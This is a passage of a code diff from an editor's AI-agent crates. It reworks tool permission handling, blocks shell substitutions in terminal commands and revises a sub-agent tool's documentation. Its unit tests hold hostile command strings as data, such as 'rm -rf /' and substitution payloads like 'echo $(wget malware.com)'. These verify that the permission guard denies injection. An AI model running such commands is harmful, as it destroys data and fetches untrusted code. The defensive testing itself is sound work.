"always_deny_pattern:mcp:server:tool\n^cargo\s" - if let Some(rest) = response_str.strip_prefix("always_deny_pattern:") { - if let Some((pattern_tool_name, pattern)) = rest.split_once('\n') { - let pattern_tool_name = pattern_tool_name.to_string(); - let pattern = pattern.to_string(); - if let Some(fs) = fs.clone() { - cx.update(|cx| { - update_settings_file(fs, cx, move |settings, _| { - settings - .agent - 
.get_or_insert_default() - .add_tool_deny_pattern(&pattern_tool_name, pattern); - }); - }); - } - } else { - log::error!("Failed to parse always deny pattern: missing newline separator in '{rest}'"); - } - return Err(anyhow!("Permission to run tool denied by user")); - } + // Handle simple "allow" / "deny" (once, no persistence) + if option_id == "allow" || option_id == "deny" { + debug_assert!( + outcome.params.is_none(), + "unexpected params for once-only permission" + ); + return option_id == "allow"; + } - // Handle simple "allow" (allow once) - if response_str == "allow" { - return Ok(()); - } + debug_assert!(false, "unexpected permission option_id: {option_id}"); + false + } - // Handle simple "deny" (deny once) - Err(anyhow!("Permission to run tool denied by user")) - }) + /// Persists an "always allow" or "always deny" permission, using sub_patterns + /// from params when present. + fn persist_always_permission( + tool: &str, + mode: ToolPermissionMode, + params: Option<&acp_thread::SelectedPermissionParams>, + fs: Option>, + cx: &AsyncApp, + ) { + let Some(fs) = fs else { + return; + }; + + match params { + Some(acp_thread::SelectedPermissionParams::Terminal { + patterns: sub_patterns, + }) => { + debug_assert!( + !sub_patterns.is_empty(), + "empty sub_patterns for tool {tool} — callers should pass None instead" + ); + let tool = tool.to_string(); + let sub_patterns = sub_patterns.clone(); + cx.update(|cx| { + update_settings_file(fs, cx, move |settings, _| { + let agent = settings.agent.get_or_insert_default(); + for pattern in sub_patterns { + match mode { + ToolPermissionMode::Allow => { + agent.add_tool_allow_pattern(&tool, pattern); + } + ToolPermissionMode::Deny => { + agent.add_tool_deny_pattern(&tool, pattern); + } + // If there's no matching pattern this will + // default to confirm, so falling through is + // fine here. 
+ ToolPermissionMode::Confirm => (), + } + } + }); + }); + } + None => { + let tool = tool.to_string(); + cx.update(|cx| { + update_settings_file(fs, cx, move |settings, _| { + settings + .agent + .get_or_insert_default() + .set_tool_default_permission(&tool, mode); + }); + }); + } + } } } @@ -3818,6 +3913,15 @@ impl ToolCallEventStreamReceiver { panic!("Expected terminal but got: {:?}", event); } } + + pub async fn expect_plan(&mut self) -> acp::Plan { + let event = self.0.next().await; + if let Some(Ok(ThreadEvent::Plan(plan))) = event { + plan + } else { + panic!("Expected plan but got: {:?}", event); + } + } } #[cfg(any(test, feature = "test-support"))] diff --git a/crates/agent/src/thread_store.rs b/crates/agent/src/thread_store.rs index dd1f650de2f59a0e681e15e7eae3fad1a49ccc41..379ae675d4bbf3c2a9570365493317178f38a804 100644 --- a/crates/agent/src/thread_store.rs +++ b/crates/agent/src/thread_store.rs @@ -2,7 +2,6 @@ use crate::{DbThread, DbThreadMetadata, ThreadsDatabase}; use agent_client_protocol as acp; use anyhow::{Result, anyhow}; use gpui::{App, Context, Entity, Global, Task, prelude::*}; -use std::collections::HashMap; use util::path_list::PathList; struct GlobalThreadStore(Entity); @@ -11,7 +10,6 @@ impl Global for GlobalThreadStore {} pub struct ThreadStore { threads: Vec, - threads_by_paths: HashMap>, } impl ThreadStore { @@ -31,7 +29,6 @@ impl ThreadStore { pub fn new(cx: &mut Context) -> Self { let this = Self { threads: Vec::new(), - threads_by_paths: HashMap::default(), }; this.reload(cx); this @@ -97,16 +94,10 @@ impl ThreadStore { let all_threads = database.list_threads().await?; this.update(cx, |this, cx| { this.threads.clear(); - this.threads_by_paths.clear(); for thread in all_threads { if thread.parent_session_id.is_some() { continue; } - let index = this.threads.len(); - this.threads_by_paths - .entry(thread.folder_paths.clone()) - .or_default() - .push(index); this.threads.push(thread); } cx.notify(); @@ -122,15 +113,6 @@ impl 
ThreadStore { pub fn entries(&self) -> impl Iterator + '_ { self.threads.iter().cloned() } - - /// Returns threads whose folder_paths match the given paths exactly. - /// Uses a cached index for O(1) lookup per path list. - pub fn threads_for_paths(&self, paths: &PathList) -> impl Iterator { - self.threads_by_paths - .get(paths) - .into_iter() - .flat_map(|indices| indices.iter().map(|&index| &self.threads[index])) - } } #[cfg(test)] @@ -306,50 +288,4 @@ mod tests { assert_eq!(entries[0].id, first_id); assert_eq!(entries[1].id, second_id); } - - #[gpui::test] - async fn test_threads_for_paths_filters_correctly(cx: &mut TestAppContext) { - let thread_store = cx.new(|cx| ThreadStore::new(cx)); - cx.run_until_parked(); - - let project_a_paths = PathList::new(&[std::path::PathBuf::from("/home/user/project-a")]); - let project_b_paths = PathList::new(&[std::path::PathBuf::from("/home/user/project-b")]); - - let thread_a = make_thread( - "Thread in A", - Utc.with_ymd_and_hms(2024, 1, 1, 0, 0, 0).unwrap(), - ); - let thread_b = make_thread( - "Thread in B", - Utc.with_ymd_and_hms(2024, 1, 2, 0, 0, 0).unwrap(), - ); - let thread_a_id = session_id("thread-a"); - let thread_b_id = session_id("thread-b"); - - let save_a = thread_store.update(cx, |store, cx| { - store.save_thread(thread_a_id.clone(), thread_a, project_a_paths.clone(), cx) - }); - save_a.await.unwrap(); - - let save_b = thread_store.update(cx, |store, cx| { - store.save_thread(thread_b_id.clone(), thread_b, project_b_paths.clone(), cx) - }); - save_b.await.unwrap(); - - cx.run_until_parked(); - - thread_store.read_with(cx, |store, _cx| { - let a_threads: Vec<_> = store.threads_for_paths(&project_a_paths).collect(); - assert_eq!(a_threads.len(), 1); - assert_eq!(a_threads[0].id, thread_a_id); - - let b_threads: Vec<_> = store.threads_for_paths(&project_b_paths).collect(); - assert_eq!(b_threads.len(), 1); - assert_eq!(b_threads[0].id, thread_b_id); - - let nonexistent = 
PathList::new(&[std::path::PathBuf::from("/nonexistent")]); - let no_threads: Vec<_> = store.threads_for_paths(&nonexistent).collect(); - assert!(no_threads.is_empty()); - }); - } } diff --git a/crates/agent/src/tool_permissions.rs b/crates/agent/src/tool_permissions.rs index 79564bbddea7063d00e18d97c8eab89533b20da5..345511c5025b25601c630c572980d44a23f724e7 100644 --- a/crates/agent/src/tool_permissions.rs +++ b/crates/agent/src/tool_permissions.rs @@ -2,13 +2,19 @@ use crate::AgentTool; use crate::tools::TerminalTool; use agent_settings::{AgentSettings, CompiledRegex, ToolPermissions, ToolRules}; use settings::ToolPermissionMode; -use shell_command_parser::extract_commands; +use shell_command_parser::{ + TerminalCommandValidation, extract_commands, validate_terminal_command, +}; use std::path::{Component, Path}; use std::sync::LazyLock; use util::shell::ShellKind; const HARDCODED_SECURITY_DENIAL_MESSAGE: &str = "Blocked by built-in security rule. This operation is considered too \ harmful to be allowed, and cannot be overridden by settings."; +const INVALID_TERMINAL_COMMAND_MESSAGE: &str = "The terminal command could not be approved because terminal does not \ + allow shell substitutions or interpolations in permission-protected commands. Forbidden examples include $VAR, \ + ${VAR}, $(...), backticks, $((...)), <(...), and >(...). Resolve those values before calling terminal, or ask \ + the user for the literal value to use."; /// Security rules that are always enforced and cannot be overridden by any setting. /// These protect against catastrophic operations like wiping filesystems. @@ -256,7 +262,30 @@ impl ToolPermissionDecision { return denial; } - let rules = match permissions.tools.get(tool_name) { + let rules = permissions.tools.get(tool_name); + + // Check for invalid regex patterns before evaluating rules. + // If any patterns failed to compile, block the tool call entirely. 
+ if let Some(error) = rules.and_then(|rules| check_invalid_patterns(tool_name, rules)) { + return ToolPermissionDecision::Deny(error); + } + + if tool_name == TerminalTool::NAME + && !rules.map_or( + matches!(permissions.default, ToolPermissionMode::Allow), + |rules| is_unconditional_allow_all(rules, permissions.default), + ) + && inputs.iter().any(|input| { + matches!( + validate_terminal_command(input), + TerminalCommandValidation::Unsafe | TerminalCommandValidation::Unsupported + ) + }) + { + return ToolPermissionDecision::Deny(INVALID_TERMINAL_COMMAND_MESSAGE.into()); + } + + let rules = match rules { Some(rules) => rules, None => { // No tool-specific rules, use the global default @@ -270,12 +299,6 @@ impl ToolPermissionDecision { } }; - // Check for invalid regex patterns before evaluating rules. - // If any patterns failed to compile, block the tool call entirely. - if let Some(error) = check_invalid_patterns(tool_name, rules) { - return ToolPermissionDecision::Deny(error); - } - // For the terminal tool, parse each input command to extract all sub-commands. // This prevents shell injection attacks where a user configures an allow // pattern like "^ls" and an attacker crafts "ls && rm -rf /". @@ -407,6 +430,18 @@ fn check_commands( } } +fn is_unconditional_allow_all(rules: &ToolRules, global_default: ToolPermissionMode) -> bool { + // `always_allow` is intentionally not checked here: when the effective default + // is already Allow and there are no deny/confirm restrictions, allow patterns + // are redundant — the user has opted into allowing everything. + rules.always_deny.is_empty() + && rules.always_confirm.is_empty() + && matches!( + rules.default.unwrap_or(global_default), + ToolPermissionMode::Allow + ) +} + /// Checks if the tool rules contain any invalid regex patterns. /// Returns an error message if invalid patterns are found. 
fn check_invalid_patterns(tool_name: &str, rules: &ToolRules) -> Option { @@ -560,6 +595,7 @@ mod tests { message_editor_min_lines: 1, tool_permissions, show_turn_stats: false, + new_thread_location: Default::default(), } } @@ -1066,6 +1102,107 @@ mod tests { )); } + #[test] + fn invalid_substitution_bearing_command_denies_by_default() { + let decision = no_rules("echo $HOME", ToolPermissionMode::Deny); + assert!(matches!(decision, ToolPermissionDecision::Deny(_))); + } + + #[test] + fn invalid_substitution_bearing_command_denies_in_confirm_mode() { + let decision = no_rules("echo $(whoami)", ToolPermissionMode::Confirm); + assert!(matches!(decision, ToolPermissionDecision::Deny(_))); + } + + #[test] + fn unconditional_allow_all_bypasses_invalid_command_rejection_without_tool_rules() { + let decision = no_rules("echo $HOME", ToolPermissionMode::Allow); + assert_eq!(decision, ToolPermissionDecision::Allow); + } + + #[test] + fn unconditional_allow_all_bypasses_invalid_command_rejection_with_terminal_default_allow() { + let mut tools = collections::HashMap::default(); + tools.insert( + Arc::from(TerminalTool::NAME), + ToolRules { + default: Some(ToolPermissionMode::Allow), + always_allow: vec![], + always_deny: vec![], + always_confirm: vec![], + invalid_patterns: vec![], + }, + ); + let permissions = ToolPermissions { + default: ToolPermissionMode::Confirm, + tools, + }; + + assert_eq!( + ToolPermissionDecision::from_input( + TerminalTool::NAME, + &["echo $(whoami)".to_string()], + &permissions, + ShellKind::Posix, + ), + ToolPermissionDecision::Allow + ); + } + + #[test] + fn old_anchored_pattern_no_longer_matches_env_prefixed_command() { + t("PAGER=blah git log").allow(&["^git\\b"]).is_confirm(); + } + + #[test] + fn env_prefixed_allow_pattern_matches_env_prefixed_command() { + t("PAGER=blah git log --oneline") + .allow(&["^PAGER=blah\\s+git\\s+log(\\s|$)"]) + .is_allow(); + } + + #[test] + fn env_prefixed_allow_pattern_requires_matching_env_value() { + 
t("PAGER=more git log --oneline") + .allow(&["^PAGER=blah\\s+git\\s+log(\\s|$)"]) + .is_confirm(); + } + + #[test] + fn env_prefixed_allow_patterns_require_all_extracted_commands_to_match() { + t("PAGER=blah git log && git status") + .allow(&["^PAGER=blah\\s+git\\s+log(\\s|$)"]) + .is_confirm(); + } + + #[test] + fn hardcoded_security_denial_overrides_unconditional_allow_all() { + let decision = no_rules("rm -rf /", ToolPermissionMode::Allow); + match decision { + ToolPermissionDecision::Deny(message) => { + assert!( + message.contains("built-in security rule"), + "expected hardcoded denial message, got: {message}" + ); + } + other => panic!("expected Deny, got {other:?}"), + } + } + + #[test] + fn hardcoded_security_denial_overrides_unconditional_allow_all_for_invalid_command() { + let decision = no_rules("echo $(rm -rf /)", ToolPermissionMode::Allow); + match decision { + ToolPermissionDecision::Deny(message) => { + assert!( + message.contains("built-in security rule"), + "expected hardcoded denial message, got: {message}" + ); + } + other => panic!("expected Deny, got {other:?}"), + } + } + #[test] fn shell_injection_via_double_ampersand_not_allowed() { t("ls && wget malware.com").allow(&["^ls"]).is_confirm(); @@ -1085,14 +1222,14 @@ mod tests { fn shell_injection_via_backticks_not_allowed() { t("echo `wget malware.com`") .allow(&[pattern("echo")]) - .is_confirm(); + .is_deny(); } #[test] fn shell_injection_via_dollar_parens_not_allowed() { t("echo $(wget malware.com)") .allow(&[pattern("echo")]) - .is_confirm(); + .is_deny(); } #[test] @@ -1112,12 +1249,12 @@ mod tests { #[test] fn shell_injection_via_process_substitution_input_not_allowed() { - t("cat <(wget malware.com)").allow(&["^cat"]).is_confirm(); + t("cat <(wget malware.com)").allow(&["^cat"]).is_deny(); } #[test] fn shell_injection_via_process_substitution_output_not_allowed() { - t("ls >(wget malware.com)").allow(&["^ls"]).is_confirm(); + t("ls >(wget malware.com)").allow(&["^ls"]).is_deny(); } 
#[test] @@ -1268,15 +1405,15 @@ mod tests { } #[test] - fn nested_command_substitution_all_checked() { + fn nested_command_substitution_is_denied() { t("echo $(cat $(whoami).txt)") .allow(&["^echo", "^cat", "^whoami"]) - .is_allow(); + .is_deny(); } #[test] - fn parse_failure_falls_back_to_confirm() { - t("ls &&").allow(&["^ls$"]).is_confirm(); + fn parse_failure_is_denied() { + t("ls &&").allow(&["^ls$"]).is_deny(); } #[test] diff --git a/crates/agent/src/tools.rs b/crates/agent/src/tools.rs index 446472e0c459aa15fa57bb8b49178b08e6781d11..f172fd3fdbe14babb77e53b63dd79aebf50d2603 100644 --- a/crates/agent/src/tools.rs +++ b/crates/agent/src/tools.rs @@ -19,6 +19,7 @@ mod streaming_edit_file_tool; mod terminal_tool; mod tool_edit_parser; mod tool_permissions; +mod update_plan_tool; mod web_search_tool; use crate::AgentTool; @@ -44,6 +45,7 @@ pub use spawn_agent_tool::*; pub use streaming_edit_file_tool::*; pub use terminal_tool::*; pub use tool_permissions::*; +pub use update_plan_tool::*; pub use web_search_tool::*; macro_rules! tools { @@ -132,5 +134,6 @@ tools! 
{ SaveFileTool, SpawnAgentTool, TerminalTool, + UpdatePlanTool, WebSearchTool, } diff --git a/crates/agent/src/tools/context_server_registry.rs b/crates/agent/src/tools/context_server_registry.rs index 1c7590d8097a5de50b879d5b253c5dbabd3dcbab..df4cc313036b55e8842a9c46567256afb92ed944 100644 --- a/crates/agent/src/tools/context_server_registry.rs +++ b/crates/agent/src/tools/context_server_registry.rs @@ -253,12 +253,14 @@ impl ContextServerRegistry { let project::context_server_store::ServerStatusChangedEvent { server_id, status } = event; match status { - ContextServerStatus::Starting => {} + ContextServerStatus::Starting | ContextServerStatus::Authenticating => {} ContextServerStatus::Running => { self.reload_tools_for_server(server_id.clone(), cx); self.reload_prompts_for_server(server_id.clone(), cx); } - ContextServerStatus::Stopped | ContextServerStatus::Error(_) => { + ContextServerStatus::Stopped + | ContextServerStatus::Error(_) + | ContextServerStatus::AuthRequired => { if let Some(registered_server) = self.registered_servers.remove(server_id) { if !registered_server.tools.is_empty() { cx.emit(ContextServerRegistryEvent::ToolsChanged); diff --git a/crates/agent/src/tools/copy_path_tool.rs b/crates/agent/src/tools/copy_path_tool.rs index 7f53a5c36a7979a01de96535f19e421fa3119e16..95688f27dcd8ca04aef72358ce52144f95138e17 100644 --- a/crates/agent/src/tools/copy_path_tool.rs +++ b/crates/agent/src/tools/copy_path_tool.rs @@ -266,7 +266,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; @@ -372,7 +375,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( diff --git 
a/crates/agent/src/tools/create_directory_tool.rs b/crates/agent/src/tools/create_directory_tool.rs index 5d8930f3c7400428d55cfe7d14bafc16d94be43a..d6c59bcce30ab26991edba0fa7181ec45d10e1b0 100644 --- a/crates/agent/src/tools/create_directory_tool.rs +++ b/crates/agent/src/tools/create_directory_tool.rs @@ -241,7 +241,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; @@ -359,7 +362,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( diff --git a/crates/agent/src/tools/delete_path_tool.rs b/crates/agent/src/tools/delete_path_tool.rs index 27ab68db667a4cf3223e6521682814dc1c245bb7..7433975c7b782a145dd3e5a80ee59cd92945a989 100644 --- a/crates/agent/src/tools/delete_path_tool.rs +++ b/crates/agent/src/tools/delete_path_tool.rs @@ -301,7 +301,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; @@ -428,7 +431,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( diff --git a/crates/agent/src/tools/edit_file_tool.rs b/crates/agent/src/tools/edit_file_tool.rs index 29b08ac09db4417123403fd3915b8575791b2a4e..0b4d7ce5eb94b79ed8f822e14b76c191788afcf9 100644 --- a/crates/agent/src/tools/edit_file_tool.rs +++ b/crates/agent/src/tools/edit_file_tool.rs @@ -1374,7 +1374,10 @@ mod tests { event .response - 
.send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); authorize_task.await.unwrap(); } diff --git a/crates/agent/src/tools/list_directory_tool.rs b/crates/agent/src/tools/list_directory_tool.rs index 1a674aaa71fef5bf9c11688e82982a5dbcfee331..7abbe1ed4c488210b9079e59765dddc8d5208bed 100644 --- a/crates/agent/src/tools/list_directory_tool.rs +++ b/crates/agent/src/tools/list_directory_tool.rs @@ -848,7 +848,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; diff --git a/crates/agent/src/tools/move_path_tool.rs b/crates/agent/src/tools/move_path_tool.rs index c246b3c5b0661546f4617bb5521766f9da3839fb..147947bb67ec646c38b51f37dd75779ed78ec85b 100644 --- a/crates/agent/src/tools/move_path_tool.rs +++ b/crates/agent/src/tools/move_path_tool.rs @@ -273,7 +273,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; @@ -379,7 +382,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( diff --git a/crates/agent/src/tools/read_file_tool.rs b/crates/agent/src/tools/read_file_tool.rs index f7a75bc63a1c461b65c3a2e6f74f2c70e0ca15f6..093a8580892cfc4cec0a061bcc10717b28c608f2 100644 --- a/crates/agent/src/tools/read_file_tool.rs +++ b/crates/agent/src/tools/read_file_tool.rs @@ -896,7 +896,10 @@ mod test { ); authorization .response - 
.send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = read_task.await; @@ -1185,7 +1188,10 @@ mod test { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let result = task.await; diff --git a/crates/agent/src/tools/restore_file_from_disk_tool.rs b/crates/agent/src/tools/restore_file_from_disk_tool.rs index c1aa8690a840ea6911dcb94c26c8cef3cb5f313d..9273ea5b8bb041e0ea53f3ea72b94b46e5a7e294 100644 --- a/crates/agent/src/tools/restore_file_from_disk_tool.rs +++ b/crates/agent/src/tools/restore_file_from_disk_tool.rs @@ -523,7 +523,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let _result = task.await; @@ -651,7 +654,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( diff --git a/crates/agent/src/tools/save_file_tool.rs b/crates/agent/src/tools/save_file_tool.rs index 99e937b9dff2a1b4781dde16bd2bf6d64edd25ad..c6a1cd79db65127164fe66f966029b58a366da7f 100644 --- a/crates/agent/src/tools/save_file_tool.rs +++ b/crates/agent/src/tools/save_file_tool.rs @@ -518,7 +518,10 @@ mod tests { ); auth.response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); let _result = task.await; @@ -646,7 +649,10 @@ mod tests { ); auth.response - 
.send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) .unwrap(); assert!( @@ -727,7 +733,10 @@ mod tests { let auth = event_rx.expect_authorization().await; auth.response - .send(acp::PermissionOptionId::new("deny")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("deny"), + acp::PermissionOptionKind::RejectOnce, + )) .unwrap(); let output = task.await.unwrap(); diff --git a/crates/agent/src/tools/spawn_agent_tool.rs b/crates/agent/src/tools/spawn_agent_tool.rs index 9c10b2fbf127c42d842300f4af865c4297cdedb8..27afbbdc3ea05ddbfea689d1bb1a18c53b42198b 100644 --- a/crates/agent/src/tools/spawn_agent_tool.rs +++ b/crates/agent/src/tools/spawn_agent_tool.rs @@ -10,21 +10,30 @@ use std::sync::Arc; use crate::{AgentTool, ThreadEnvironment, ToolCallEventStream, ToolInput}; -/// Spawns an agent to perform a delegated task. +/// Spawn a sub-agent for a well-scoped task. /// -/// Use this tool when you want to: -/// - Run multiple tasks in parallel. -/// - Delegate a self-contained task where you only need the final outcome. +/// ### Designing delegated subtasks +/// - An agent does not see your conversation history. Include all relevant context (file paths, requirements, constraints) in the message. +/// - Subtasks must be concrete, well-defined, and self-contained. +/// - Delegated subtasks must materially advance the main task. +/// - Do not duplicate work between your work and delegated subtasks. +/// - Do not use this tool for tasks you could accomplish directly with one or two tool calls. +/// - When you delegate work, focus on coordinating and synthesizing results instead of duplicating the same work yourself. +/// - Avoid issuing multiple delegate calls for the same unresolved subproblem unless the new delegated task is genuinely different and necessary. 
+/// - Narrow the delegated ask to the concrete output you need next. +/// - For code-edit subtasks, decompose work so each delegated task has a disjoint write set. +/// - When sending a follow-up using an existing agent session_id, the agent already has the context from the previous turn. Send only a short, direct message. Do NOT repeat the original task or context. /// -/// Do NOT use this tool for tasks you could accomplish directly with one or two tool calls (e.g. reading a file, running a single command). +/// ### Parallel delegation patterns +/// - Run multiple independent information-seeking subtasks in parallel when you have distinct questions that can be answered independently. +/// - Split implementation into disjoint codebase slices and spawn multiple agents for them in parallel when the write scopes do not overlap. +/// - When a plan has multiple independent steps, prefer delegating those steps in parallel rather than serializing them unnecessarily. +/// - Reuse the returned session_id when you want to follow up on the same delegated subproblem instead of creating a duplicate session. /// -/// You will receive only the agent's final message as output. -/// -/// **New session** (no session_id): Creates a new agent that does NOT see your conversation history. Include all relevant context (file paths, requirements, constraints) in the message. -/// -/// **Follow-up** (with session_id): Sends a follow-up to an existing agent session. The agent already has full context, so send only a short, direct message — do NOT repeat the original task or context. Examples: "Also update the tests", "Fix the compile error in foo.rs", "Retry". -/// -/// - If spawning multiple agents that might write to the filesystem, provide guidance on how to avoid conflicts (e.g. assign each to different directories). +/// ### Output +/// - You will receive only the agent's final message as output. +/// - Successful calls return a session_id that you can use for follow-up messages. 
+/// - Error results may also include a session_id if a session was already created. #[derive(Debug, Clone, Serialize, Deserialize, JsonSchema)] #[serde(rename_all = "snake_case")] pub struct SpawnAgentToolInput { diff --git a/crates/agent/src/tools/streaming_edit_file_tool.rs b/crates/agent/src/tools/streaming_edit_file_tool.rs index f3f100b4434b4f9e5d0830d8ba525a45b28906f6..4be6b8c61efb237279cbef298242b7b6e35857ce 100644 --- a/crates/agent/src/tools/streaming_edit_file_tool.rs +++ b/crates/agent/src/tools/streaming_edit_file_tool.rs @@ -118,7 +118,7 @@ pub struct Edit { pub new_text: String, } -#[derive(Default, Debug, Deserialize)] +#[derive(Clone, Default, Debug, Deserialize)] struct StreamingEditFileToolPartialInput { #[serde(default)] display_description: Option, @@ -132,7 +132,7 @@ struct StreamingEditFileToolPartialInput { edits: Option>, } -#[derive(Default, Debug, Deserialize)] +#[derive(Clone, Default, Debug, Deserialize)] pub struct PartialEdit { #[serde(default)] pub old_text: Option, @@ -314,12 +314,19 @@ impl AgentTool for StreamingEditFileTool { ) -> Task> { cx.spawn(async move |cx: &mut AsyncApp| { let mut state: Option = None; + let mut last_partial: Option = None; loop { futures::select! 
{ partial = input.recv_partial().fuse() => { let Some(partial_value) = partial else { break }; if let Ok(parsed) = serde_json::from_value::(partial_value) { + let path_complete = parsed.path.is_some() + && parsed.path.as_ref() == last_partial.as_ref().and_then(|p| p.path.as_ref()); + + last_partial = Some(parsed.clone()); + if state.is_none() + && path_complete && let StreamingEditFileToolPartialInput { path: Some(path), display_description: Some(display_description), @@ -768,14 +775,6 @@ impl EditSession { ensure_buffer_saved(&buffer, &abs_path, tool, cx)?; - if matches!(mode, StreamingEditFileMode::Write) { - tool.action_log.update(cx, |log, cx| { - log.buffer_created(buffer.clone(), cx); - }); - } - tool.action_log - .update(cx, |log, cx| log.buffer_read(buffer.clone(), cx)); - let diff = cx.new(|cx| match mode { StreamingEditFileMode::Write => Diff::manual(buffer.clone(), cx), StreamingEditFileMode::Edit => Diff::new(buffer.clone(), cx), @@ -789,6 +788,11 @@ impl EditSession { } }) as Box); + tool.action_log.update(cx, |log, cx| match mode { + StreamingEditFileMode::Write => log.buffer_created(buffer.clone(), cx), + StreamingEditFileMode::Edit => log.buffer_read(buffer.clone(), cx), + }); + let old_snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); let old_text = cx .background_spawn({ @@ -1975,6 +1979,13 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Setup + single edit that stays in-progress (no second edit to prove completion) + sender.send_partial(json!({ + "display_description": "Single edit", + "path": "root/file.txt", + "mode": "edit", + })); + cx.run_until_parked(); + sender.send_partial(json!({ "display_description": "Single edit", "path": "root/file.txt", @@ -2637,7 +2648,10 @@ mod tests { event .response - .send(acp::PermissionOptionId::new("allow")) + .send(acp_thread::SelectedPermissionOutcome::new( + acp::PermissionOptionId::new("allow"), + acp::PermissionOptionKind::AllowOnce, + )) 
.unwrap(); authorize_task.await.unwrap(); } @@ -3543,6 +3557,12 @@ mod tests { let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Transition to BufferResolved + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + })); + cx.run_until_parked(); + sender.send_partial(json!({ "display_description": "Overwrite file", "path": "root/file.txt", @@ -3618,8 +3638,9 @@ mod tests { // Verify buffer still has old content (no content partial yet) let buffer = project.update(cx, |project, cx| { let path = project.find_project_path("root/file.txt", cx).unwrap(); - project.get_open_buffer(&path, cx).unwrap() + project.open_buffer(path, cx) }); + let buffer = buffer.await.unwrap(); assert_eq!( buffer.read_with(cx, |b, _| b.text()), "old line 1\nold line 2\nold line 3\n" @@ -3758,7 +3779,7 @@ mod tests { assert!( !changed.is_empty(), "action_log.changed_buffers() should be non-empty after streaming edit, - but no changed buffers were found \u{2014} Accept All / Reject All will not appear" + but no changed buffers were found - Accept All / Reject All will not appear" ); } @@ -3803,6 +3824,157 @@ mod tests { ); } + #[gpui::test] + async fn test_streaming_edit_file_tool_fields_out_of_order_in_write_mode( + cx: &mut TestAppContext, + ) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "old_content"})).await; + let (sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "write" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "write", + "content": "new_content" + })); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Overwrite file", + "mode": "write", + "content": "new_content", + 
